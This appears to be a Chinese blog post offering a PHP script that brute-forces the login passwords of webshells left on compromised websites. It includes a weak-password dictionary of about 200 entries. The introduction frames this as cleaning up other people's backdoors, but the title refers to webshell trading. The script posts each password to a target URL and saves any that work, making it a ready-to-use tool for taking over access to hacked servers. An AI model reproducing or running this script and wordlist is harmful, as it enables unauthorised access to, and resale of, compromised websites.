webshell交易,webshell暴力破解脚本+字典文件
前言
【webshell交易】有时候我们经常会发现很多网站都有前人“栽的树”,既然有后门了,我们为了维护网路世界的和平与正义自然要消除掉,那么拿到这个webshell的钥匙是关键。(网上也有很多后门扫描工具,详情可以在本站搜索黑吃黑)那么如何获得打开别人后门的钥匙呢,鉴于大部分webshell都是简单的密码校验没有正经的验证码,而且大部分webshell都是建议的常用弱口令密码,这种情况爆破是种不错的选择。分享一个用php写的webshell爆破脚本,因为单线程所以可以多开实现快速爆破,另送一份简单的弱口令字典。
爆破脚本
<?php
$passarr=file("pass2.txt");
foreach ($passarr as $key => $value) {
$value=str_replace(chr(10),"",str_replace(chr(13),"",$value));
$gettoken=postdata("http://127.0.0.1/shell.php",array("postpass" => "{$value}"),"密码错误");
}
/*
/ postdata($url,$data,$par);
/ $url webshell地址 string
/ $data 把postdata换成你的密码参数
/ $par 错误关键词
*/
function postdata($url,$data,$par){
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
$post_data = $data;
curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
$data1 = curl_exec($curl);
curl_close($curl);
if (strpos($data1, $par)>1) {
print_r($data["postpass"]."错误\n");
return;
}else{
file_put_contents("OOOK.txt",$data["postpass"],FILE_APPEND);
die($data["postpass"]."爆破成功");
}
print_r(strpos($data1, $par));
print_r($par);
}
function decodeUnicode($str)
{
return preg_replace_callback('/\\\\u([0-9a-f]{4})/i',
create_function(
'$matches',
'return mb_convert_encoding(pack("H*", $matches[1]), "UTF-8", "UCS-2BE");'
),
$str);
}
?>密码字典
!@#123
*******
000
1
10011C120105101
111
12
123
123!@#
123321
12345
123456
123654
123654789
123654789!
123654789.
123go
1314520
133135136
13572468
19880118
1992724
20080808
3452510
360
360sb
376186027
3est
45189946
4816535
4lert
4ngel
520
52013
5201314
5201314
520hack
521
535039
54321
584521
654321
654321
80sec
847381979
847381979
888999
96315001
981246
admin
admin888
aiezu
air
angel
aoyunhui
asp
aspadmin
aspxadmin
axiao
baidu
baiduadmin
baidusb
Baike
bzxyd
bzxyd
C
caodan
caonima
caonimade
caonimadebi
caonimei
cc
ceshi2009
chengnuo
chenxue
chinared
chuang
cmdshell
cms
cnot
dangdang
danteng
dantong
daohao
daoke
daoker
daokers
daoqq
darkst
dreamh
et520
Evav
evil
evilhack
evilhacker
evilhk
F.S.T
f19ht
fclshark
fight
fst
fuck
fucker
fuckhack
fuckhacker
fuckit
FuckYou
G.xp
ghost
ghost
gxp
h4ck
h4ck3r
hack
hack520
hacker
hackersb
hackqingshu
hacksb
hake
hakecc
haode
heixiaozi
hkk007
hkmjj
hkmm
hongker
honker
HqzX
huaidan
iamnotadmin
iloveshell
jcksyes
jiaozhu
jiaozu
jing
jinjin
jspadmin
jtk2352
kill
kissy
lcx
lengfeng
lengfengsk
lengxue
lin
liner
login
love
lovehack7758
lover
loveshell
lunnijie
lx
maek
mama
mama520
nc
noadmin
nohack
noid
ouou
phpadmin
qingshu
qingshu$
r4sky
rensheng
rfkl
rinima
rs
rusuan
sa
sadness
sasa
Satan
sb
sb360
sh3ll
shaomo
shell
shunzi
sin
spider
sq19880602
sunzi
sz
T00ls
tag
tengxin
tengxunsb
tig
tiger
tonecan
tx
ufo
ufohack
username
webadmin
webadmin2
WebShell
whatweb
windows
winner
wocaonima
worinima
wrsk
wrsky
wuzheng
wwwhakecc
xiaoe
xiaowu
xiaoyi
xxoxx
xxxxx
ying
yong
youaresb
youguest
yrpx
yuemo
yushiwuzheng
yy
yyswxws
zhack声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。
